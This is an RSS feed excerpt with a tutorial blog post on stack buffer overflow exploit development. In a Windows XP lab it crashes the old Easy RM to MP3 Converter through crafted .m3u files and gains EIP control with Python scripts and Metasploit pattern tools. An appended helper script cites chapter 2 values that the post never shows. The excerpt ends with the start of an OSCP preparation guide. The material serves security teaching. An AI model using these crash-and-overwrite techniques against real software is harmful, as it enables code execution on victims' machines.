            <description>&lt;h4 id=&quot;reverse-engineering-and-exploit-development-made-easy---chapter-1&quot;&gt;Reverse Engineering and Exploit Development Made Easy - Chapter 1&lt;/h4&gt;

&lt;h5 id=&quot;stack-control&quot;&gt;Stack Control&lt;/h5&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# whoami&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;So before we get to the fun stuff, I would like to take some time to introduce myself.&lt;/p&gt;

&lt;p&gt;I’m 4p0cryph0n, your run-of-the-mill cyber security junkie! Cyber security has played a huge role in my life and who I am as a person, as I’ve been doing it since I was in my early teens.&lt;/p&gt;

&lt;p&gt;I’ve always looked forward to learning new techniques to boost my repertoire, and even like sharing some knowledge. Before we begin with the introduction, I would also like to thank all the admins and the NetSec Focus team as a whole, for providing us with a really amazing platform where we can share knowledge with each other, and grow as a cyber security community. Kudos guys!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;#&lt;/strong&gt; &lt;strong&gt;uname&lt;/strong&gt; &lt;strong&gt;-a&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The objective of this series is to make Reverse Engineering and Exploit Development easy to understand. I mean, who wouldn’t want to be a l33t hackerman right?! We will select multiple learning resources, methods, and knowledge bases (like corelan.be, fuzzysecurity etc.) to make sure that you guys, and me of course, grasp every single concept and learn something new with every completed chapter.&lt;/p&gt;

&lt;p&gt;Since the motto has always been ‘Try Harder’, things will get hard here, but I assure you that it will be all worth it in the end. But don’t feel left out here, I’ll be learning with you guys!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;#&lt;/strong&gt; &lt;strong&gt;configure&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;So, first steps bois. We will go over the resources in chronological order, so feel free to do some pre-reading and research before you go over this post. A few extra hours will only sharpen your skills!&lt;/p&gt;

&lt;p&gt;We will start with the most basic type of exploit dev in the first chapter, i.e. Stack Buffer Overflows. Also, keep in mind that my ways can be slightly different from the ones used in the resources; this is to demonstrate that each technique can be executed in any number of ways. Creativity is your best friend here!&lt;/p&gt;

&lt;p&gt;Journey from Noob to Pro&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Chapter 1: Stack Based Overflows&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./CoolStuff&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Hey guys, welcome to chapter 1! The resource that we will be using is corelan.be, a really valuable resource for exploit development knowledge. Just a little overview before we begin: the idea here is to overwrite EIP so that it points to a specific location in the stack. This location will hold our desired payload.&lt;/p&gt;

&lt;p&gt;If you’re still very new to how things work in memory, I will recommend that you read the explanation given on corelan.be exploit tutorial 1. It will explain the fundamentals of the stack, and most pointers that concern us for now.&lt;/p&gt;

&lt;p&gt;With that being said, let us dive right in!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./Setup&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Okay, we will need two machines to replicate this scenario: a victim, and an attacker machine. This first lesson will focus on exploiting a binary that is made for Windows XP. I will be using SP3 on my VM. Also, note that we will be using a 32-bit target to learn the basics of reverse engineering. My attacker machine is Linux. I will recommend Kali because it has Metasploit and many other tools pre-installed.&lt;/p&gt;

&lt;p&gt;The binary that we will be exploiting is Easy RM To MP3 converter, specifically version 2.7.3.700. You can download &lt;a href=&quot;https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe&quot;&gt;this particular one&lt;/a&gt; from the corelan.be site on the post Exploit Tutorial Part 1; all you’ll have to do is make an account.&lt;/p&gt;

&lt;p&gt;The debugger that I’ll be using is Immunity Debugger. You can use WinDbg or OllyDbg as well.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;:&lt;/strong&gt;&lt;strong&gt;~&lt;/strong&gt;&lt;strong&gt;# ./BufOverflow&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Corelan developers have used Perl as their choice of language but I’ll be using Python, as I’m more comfortable with it.&lt;/p&gt;

&lt;p&gt;So, let’s start off by analysing the UI of this application:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image1.png&quot; alt=&quot;Easy RM&quot; /&gt;&lt;/p&gt;

&lt;p&gt;From my research on this application, it converts .m3u files to .mp3. Only problem? This application puts data directly onto the stack. If we overflow/crash it just right, we will be able to manipulate the stack and its pointers to our liking.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;One thing to note: You will NOT find such vulnerabilities in this day and age, as this was a vulnerability from the early 2000s. Things like stack protection, ASLR and DEP, and other ways to counter this vulnerability have already been introduced. But this exploit will help us in understanding the fundamentals of Exploit Development and Reverse Engineering. So, don’t take this lightly!&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Let’s do a quick test. I wrote some code to write 20000 As to an m3u file. This is a completely random number. Let’s run this code!&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;trash&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;20000&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;trash&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image2.png&quot; alt=&quot;lol.m3u&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now let’s transfer this .m3u to the victim machine and load the file. I’m using the drag and drop feature in VirtualBox, but you can alternatively use the shared folders feature.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image3.png&quot; alt=&quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Okay, we haven’t crashed the application yet, and the program has handled our exception successfully. Let’s reopen our application and try with 30000 As.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image4.png&quot; alt=&quot;Crashed&quot; /&gt;&lt;/p&gt;

&lt;p&gt;And it’s crashed. So, we know how to crash it now, but what good does that do? We need to crash it in our desired way. Think of it like orchestrated chaos ;)&lt;/p&gt;

&lt;p&gt;Now let’s fire the debugger up and see what’s under the hood. Click on File &amp;gt; Open and select the app. Then, click on the play button and load your file like normal.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image5.png&quot; alt=&quot;Debugger registers&quot; /&gt;&lt;/p&gt;

&lt;p&gt;A quick look at the registers shows us that EIP has the value of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;41414141&lt;/code&gt; (AAAA).&lt;/p&gt;

&lt;p&gt;EIP is the instruction pointer; it holds the address of the next instruction that must be executed. As &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;41414141&lt;/code&gt; is not a valid address for an instruction, you will see the message Access violation when executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;[41414141]&lt;/code&gt; at the bottom.&lt;/p&gt;

&lt;p&gt;We can also see that we have filled the memory ESP points to with our As. ESP is the stack pointer; it points to the top of the stack, which is where the data we sent now sits.&lt;/p&gt;

&lt;p&gt;Shift your vision to the stack window as well; this will also tell us that ESP and EIP are filled with our As. The value that is currently highlighted shows the data at ESP.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image6.png&quot; alt=&quot;Stack Window&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Now, we need to find something called an offset. This is the number of bytes we need to overflow the stack by, to reach a specific location. Think of it like filling a beaker with a solution. You need to reach the 150 cm&lt;sup&gt;3&lt;/sup&gt; mark, so you will only fill until you reach that mark.&lt;/p&gt;

&lt;p&gt;We need to find the offset for EIP, so that at the end of this, we can write our desired instruction to EIP. Our final structure should look like this: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;AAAAAAAAAAAAAAA....BBBBCCCCCCCCCCCCCC......&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;The As will be filled until we reach EIP, EIP will hold four Bs for us, and then to balance everything out, the rest needed to cause a crash will be a bunch of Cs. This technique is referred to as gaining EIP control.&lt;/p&gt;

&lt;p&gt;So to make this process easier, I’ll further divide our 30000 bytes into 25000 As and 5000 Bs. This will help us understand whether we reach EIP within our As or our Bs.&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;trash&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25000&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;trash2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;B&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;5000&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;trash&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;trash2&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now, let’s generate the file and load it within the debugger.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image7.png&quot; alt=&quot;AB Buffer Registers&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Okay great, as EIP has the value of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;42424242&lt;/code&gt; (BBBB), it tells us that somewhere in our 5000 Bs EIP has already been reached.&lt;/p&gt;

&lt;p&gt;To determine the exact position of EIP, we will use a pattern. Think of it like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;A123B123C123D123&lt;/code&gt;. This is a pattern right? So if EIP contains &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;C123&lt;/code&gt; for example, I’ll instantly know that it takes 8 bytes to reach EIP, and the rest after that can be junk.&lt;/p&gt;

&lt;p&gt;Your Kali box comes with two very important tools for this: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pattern_create.rb&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pattern_offset.rb&lt;/code&gt;. So let’s generate a unique pattern of length 5000 and use that in place of the Bs in our script.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/usr/share/metasploit-framework/tools/pattern_create.rb -l 5000&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image8.png&quot; alt=&quot;Pattern generator trash&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Let’s generate the file with the Metasploit pattern and load it within the debugger.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image9.png&quot; alt=&quot;Debugger&quot; /&gt;&lt;/p&gt;

&lt;p&gt;As I said before, the one that is highlighted in green is the value stored at ESP. If you go one address up in the stack window, you will see what’s stored in EIP: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;J8bj&lt;/code&gt; in my case. Now, let’s find out how many bytes it took to reach EIP using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;pattern_offset.rb&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/usr/share/metasploit-framework/tools/pattern_offset.rb -q j8bj&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;I get the offset as 1075. So now, my final structure will look something like this:&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&quot;A&quot;*(25000+1075) + &quot;BBBB&quot; + &quot;C&quot;*(30000-((25000+1075) + 4))&lt;/code&gt;&lt;/p&gt;

&lt;div class=&quot;language-python highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;os&lt;/span&gt;
&lt;span class=&quot;kn&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;sys&lt;/span&gt;

&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;open&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;lol.m3u&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&quot;w+&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;A&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;25000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;1075&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;BBBB&quot;&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&quot;C&quot;&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;*&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;mi&quot;&gt;30000&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;-&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nb&quot;&gt;len&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)))&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;crash&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk1&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;eip&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;+&lt;/span&gt; &lt;span class=&quot;n&quot;&gt;junk2&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;crash&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;n&quot;&gt;f&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;n&quot;&gt;close&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Now, let’s see if our Math game is strong ;)&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/assets/img/posts/4p0cryph0n/chapter1/image10.png&quot; alt=&quot;EIP Control&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Yess! We now have control of EIP, which determines the next instruction to be executed. If you made it this far, give yourself a pat on the back! In the next chapter we’ll be generating and placing shellcode, then using our control over EIP to execute our payload.&lt;/p&gt;
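&lt;p&gt;The pattern step above, reimplemented in plain Python as an added example (this is not the post’s script and not Metasploit’s own code): it rebuilds the triplet scheme pattern_create.rb uses, looks up the EIP bytes either as the text read from the stack window or as the dword shown in the EIP register, and also packs the chapter 2 JMP ESP address into the little-endian form the eip variable needs. The case-exact needle j8Bj and the register value 0x6A42386A are derived from that scheme and the post’s offset of 1075; the file-offset helper assumes the 25000 bytes of filler the post places before the pattern.&lt;/p&gt;

```python
"""Cyclic pattern generation and offset lookup, in plain Python.

Added example for this chapter; it is neither the post's script nor Metasploit's
own code. It reproduces the triplet scheme of pattern_create.rb (one uppercase
letter, one lowercase letter, one digit, with the digit cycling fastest), so
the numbers line up with the post: the bytes read out of EIP sit at offset 1075
in a 5000-byte pattern, and the JMP ESP address 0x01D2F23A packs to the
little-endian bytes that the eip variable in chapter 2 carries.
"""
import itertools
import string


def pattern_create(length):
    """Return `length` bytes of the Aa0Aa1Aa2... pattern (at most 20280 bytes)."""
    triplets = itertools.product(string.ascii_uppercase,
                                 string.ascii_lowercase,
                                 string.digits)
    needed = (length + 2) // 3                      # ceil(length / 3) triplets
    text = "".join("".join(t) for t in itertools.islice(triplets, needed))
    data = text.encode("ascii")[:length]
    if len(data) != length:
        raise ValueError("the triplet scheme runs out after 20280 bytes")
    return data


def pattern_offset(pattern, needle):
    """Offset of `needle` inside `pattern`, or -1 if it is not there.

    `needle` may be the four characters seen in the stack window (str or
    bytes) or the dword shown in the EIP register (int). x86 is little-endian,
    so a register value such as 0x6A42386A has its bytes reversed back into
    memory order (b"j8Bj") before searching; pattern_offset.rb applies the
    same conversion to a hex query.
    """
    if isinstance(needle, int):
        needle = needle.to_bytes(4, "little")
    elif isinstance(needle, str):
        needle = needle.encode("ascii")
    return pattern.find(needle)


def pack_address(addr):
    """Pack a 32-bit address into the byte order it must have in the file.

    Immunity displays the JMP ESP address as 01D2F23A. In memory on x86 the
    least significant byte comes first, so the file has to contain the bytes
    3A F2 D2 01, which is what the eip string in the final script spells out.
    """
    return addr.to_bytes(4, "little")


def eip_offset_in_file(prefix_len, pattern, needle):
    """Offset of EIP from the start of the .m3u when the pattern follows
    `prefix_len` bytes of filler (the post's 25000 As): 25000 + 1075."""
    off = pattern_offset(pattern, needle)
    if off == -1:
        raise ValueError("EIP value not found in the pattern")
    return prefix_len + off


if __name__ == "__main__":
    pat = pattern_create(5000)
    print(pat[:24])                                  # b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7'
    print(pattern_offset(pat, "j8Bj"))               # 1075
    print(pattern_offset(pat, 0x6A42386A))           # 1075, same bytes via EIP
    print(eip_offset_in_file(25000, pat, "j8Bj"))    # 26075
    print(pack_address(0x01D2F23A).hex())            # 3af2d201
```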
</description>
            <pubDate>Mon, 01 Jul 2019 00:00:00 +0000</pubDate>
        </item>
        
        <item>
            <title>The Journey to Try Harder: TJnull’s Preparation Guide for PWK/OSCP</title>
            <link>/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html</link>
            <guid isPermaLink="true">/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html</guid>
            <description>&lt;h3 id=&quot;table-of-contents&quot;&gt;Table of Contents:&lt;/h3&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;#overview&quot;&gt;Overview&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#dedication&quot;&gt;Dedication&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#a-word-of-warning&quot;&gt;A Word of Warning!&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-1-getting-comfortable-with-kali-linux&quot;&gt;Section 1: Getting Comfortable with Kali Linux&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-2-essential-tools-in-kali&quot;&gt;Section 2: Essential Tools in Kali&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-3-passive-reconnaissance&quot;&gt;Section 3: Passive Reconnaissance&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-4-active-reconnaissance&quot;&gt;Section 4: Active Reconnaissance&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-5-vulnerability-scanning&quot;&gt;Section 5: Vulnerability Scanning&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-6-buffer-overflows&quot;&gt;Section 6: Buffer Overflows&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-7-handling-public-exploits&quot;&gt;Section 7: Handling Public Exploits&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-8-transferring-files-to-your-target&quot;&gt;Section 8: Transferring Files to your target&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-9-privilege-escalation&quot;&gt;Section 9: Privilege Escalation&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-10-client-side-attacks&quot;&gt;Section 10: Client-Side Attacks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-11-web-application-attacks&quot;&gt;Section 11: Web Application Attacks&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-12-password-cracking&quot;&gt;Section 12: Password Cracking&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-13-port-redirection-and-pivoting&quot;&gt;Section 13: Port Redirection and Pivoting&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-14-metasploit-framework&quot;&gt;Section 14: Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#section-15-antivirus-bypassing&quot;&gt;Section 15: Antivirus Bypassing&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#extra-resources&quot;&gt;Extra Resources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#setting-up-your-pentesting-environment&quot;&gt;Setting up your Pentesting Environment&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#wargameshands-on-challenges&quot;&gt;Wargames/Hands-on Challenges&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#capture-the-flag-competitions-ctfscyber-competitions&quot;&gt;Capture the Flag Competitions (CTFs)/Cyber Competitions&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#bug-bounty-programs&quot;&gt;Bug Bounty Programs&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#vulnerable-machines&quot;&gt;Vulnerable Machines&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#tips-to-participate-in-the-proctored-oscp-exam&quot;&gt;Tips to participate in the Proctored OSCP exam&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#other-resources&quot;&gt;Other Resources&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;#conclusion&quot;&gt;Conclusion&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;overview&quot;&gt;Overview:&lt;/h1&gt;
&lt;p&gt;For the past 4 years of my life I had one goal: Pass OSCP on my first try. I started by reviewing the course syllabus and I realized there were some things that I did not know, which made me nervous to start the course. So, I went through a variety of resources until I thought I was ready to begin. This guide contains those resources and my advice to prepare for your adventure to take the PWK/OSCP!&lt;/p&gt;

&lt;p&gt;For those of you that would like to know about my journey when I took the course and exam, you can find my earlier post here: 
&lt;a href=&quot;https://www.netsecfocus.com/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html&quot;&gt;https://www.netsecfocus.com/oscp/review/2019/01/29/An_Adventure_to_Try_Harder_Tjnulls_OSCP_Journey.html&lt;/a&gt;&lt;/p&gt;

&lt;h1 id=&quot;dedication&quot;&gt;Dedication:&lt;/h1&gt;
&lt;p&gt;A big shout out goes to abatchy! Without his guide I would have never started exploring for other resources. Thank you for creating your original guide: 
&lt;a href=&quot;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&quot;&gt;https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I also want to thank the following people for taking the time to read this guide:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/reybango&quot;&gt;Rey Bango&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/TunnyTraffic&quot;&gt;Tunny Traffic aka VCSEC. A moderator at Netsec Focus&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://twitter.com/g0tmi1k&quot;&gt;G0t Mi1k&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;The team at &lt;a href=&quot;https://twitter.com/offsectraining&quot;&gt;Offensive Security&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This guide has been approved by Offensive Security!&lt;/p&gt;

&lt;h1 id=&quot;a-word-of-warning&quot;&gt;A Word of Warning!:&lt;/h1&gt;
&lt;p&gt;Do not expect these resources to be the main thing you use for obtaining OSCP. When you are ready to take the course, you should expect the following:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Spending a lot of time researching.&lt;/li&gt;
  &lt;li&gt;Do not expect the admins or even other students to give you answers easily.&lt;/li&gt;
  &lt;li&gt;Plan to make a commitment to this and have an open mindset to learning new things.&lt;/li&gt;
